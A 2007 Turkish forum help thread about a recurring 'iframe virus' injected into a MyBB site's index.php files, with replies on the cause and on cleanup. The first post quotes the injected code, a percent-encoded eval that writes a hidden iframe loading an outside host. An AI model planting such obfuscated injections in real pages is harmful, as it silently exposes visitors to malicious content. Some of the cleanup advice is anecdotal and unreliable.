Tarih: 2007-10-02, 17:16:41 Mesaj konusu: i f r a m e virüsü kurtuluşu ?
merhabalar
ikidebir siteme böle kod ekleniyor. avaba kendi kendinemi ekliyo. birisimi ekliyo. bıktım düzeltmekten.
Forumum mybb
admin/index.php dosyasına ce
index.php
dosyalarına ekleniyor. site curcuna gözüküor. o zaman. bozuk şeklinde oluyor.
Kod:
echo "<body id=\"logo\"><script>e v a l(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%6 5%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%65%63%32% 31%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%61%74%6f%6d%61%6b%61%79%61%6e%2e%62 %69%7a%2f%69%6e%64%65%78%2e%70%68%70%3f%6f%75%74%3d%31%31%39%30%32%33%38%37%33%3 2%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28% 29%2a%32%32%33%34%34%36%29%2b%27%35%65%37%33%31%39%5c%27%20%77%69%64%74%68%3d%36 %36%39%20%68%65%69%67%68%74%3d%33%33%34%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6 c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>\n";
En son mechulsun tarafından 2007-10-05, 03:50:16 tarihinde değiştirildi, toplam 1 kere değiştirildi
ya ben dosyanın yenisini atıyorum. yine bulaşıyo. mybbnin bütün dosyalarına attım. düzeliyor. sonra ine böle oluyo.
ve sitemi indirdim. tarama yaptırdım hiçbişey yok ama hala bu kod ekleniyo oraya delirdim artık (((8
Tarih: 2007-10-05, 03:48:45 Mesaj konusu: Re: bu kod ne oluyor
Arkadaşlar Ben Sorunu Buldum. Bulaşanlara Bilgi Amaçlı olsun diye Yardımcı olayım.
Bu Kod İframe Virüsü oluyormuş. O Virüs pcden ftp programı yoluyla ulaşmıştır.... Bütün İndex.php veya İndex.html Dosyalarına Yerleşmektedir. Yapmamız Gereken ise o virüslü kodu siliniz. Yenisi Varsa Upload ediniz...
Sonra Pcye Format atınız bence.
Format atar atmaz ftp şifresini değiştiriniz...
1- Sadece indexlere bulaşmıyor,
2- Index yada bulaştığı dosyayı değiştirmek çözüm değil,
3- PC ye format atmak da önemli değil,
4- FTP Şifresi de sorun olmaz...
Daha önce bu konuda epey bilgi vermiştim... Geçmiş mesajlara bakarsanız, daha detaylı bilgilere ulaşabilirsiniz.
1- Sadece indexlere bulaşmıyor,
2- Index yada bulaştığı dosyayı değiştirmek çözüm değil,
3- PC ye format atmak da önemli değil,
4- FTP Şifresi de sorun olmaz...
Daha önce bu konuda epey bilgi vermiştim... Geçmiş mesajlara bakarsanız, daha detaylı bilgilere ulaşabilirsiniz.
gelişimi...
1. sitenizde açık bulunan bir modül aracılığı ile sitenize .dosya.php .dosya.html gibi bir dosya atıyor bu dosya bir çeşit ftp aracı özelliği taşıyor...
2. yüklenen dosya ile dilediği yere yazdırıp çizdirip değer değiştirip yenilikler yapılabiliyor...
3. bunu yemişseniz ne yaparsanız yapın kurtuluşunuz yok...
çözüm...
1. şüphelendiğiniz modülleri siliniz
2. kodu yiyen dosyaları yenileri ile değiştirip ftp şifrenizi değiştiriniz...
3. şüpheli modüller sırası ile: fıkra, şiir, My_eGallery, coppermine, Köşe_Yazıları (alt sürümleri 4.3-2 alt sürümleri) Card, Site_Messenger 1.4 den alt sürümleri, son olarak shoutbox 8.5 alt sürümleri...
Not: youtube ve benzeri modüller bu kategori içinde yer alabilirler...
Bunun tek çaresi ya virüsü bulup sileceksiniz ki virüsü ayırt etmek bayağı bir zor. Genellikle cpanel kullanan kişilerde mail klasörüne yerleşiyor. mail klasörünü komple bilgisayarınıza indirin nortonun en güncel hali ile tarayın size tavsiyem... Eğer virüsü bulursa, hangi klasörde olduğuna bakın, ftp den o dosyayı silin. Virüs temizlenmiş olacaktır. Defalarca bu yöntemle birçok kişiyi virüsten kurtardım.
İkincisi ise, virüsü bulamadığınız takdirde, tek çareniz hostu silmeniz ve tekrar oluşturmanız. Bunun için tüm yedeklerinizi alın, host yetkilisine hesabınızı silip tekrar oluşturmasını iletin. Yeni hesabınız oluşturulduğunda tüm dosyalarınızı (tabi tekrar antivirüs ile taramanızda fayda var...) siteye yükleyin. Bunu da deneyen arkadaşlarım olumlu sonuç aldılar.
Not: Unutmayın ki eklediği kodları silmek asla kalıcı çözüm değildir. Virüsü siteden atmadıkça o her zaman zararlarını gösterecektir.
codere katılıyorum. benim basıma gelmişti.mail klasöründeydi virüs ve silinmiyordu.yedekelri aldım ve hostu sıfırlattırdım. sonra tekrar siteyi attım sorun yok.bu arada şifreleri değişmede fayda var.ben ftp yi bi arkadaşımla beraber kullanıyordum.o diyordu benim bilgisayarda virüs olmaz vs. en sonunda dedim kaspersky in son sürümünü indir ve bilgisayarı virüs dolu cıktı.yani anlayacagınız hatayı illaki kendinizde aramayınız.en iyi yol bence yedeklerinizi alın virüsten ayırın daha sonraşifrenizi değiştirin ve tekrar atın.
Bu forumda yeni başlıklar açamazsınız Bu forumdaki başlıklara cevap veremezsiniz Bu forumdaki mesajlarınızı değiştiremezsiniz Bu forumdaki mesajlarınızı silemezsiniz Bu forumdaki anketlerde oy kullanamazsınız
Arama
Rütbeliler
Profil
Giriş
(((8
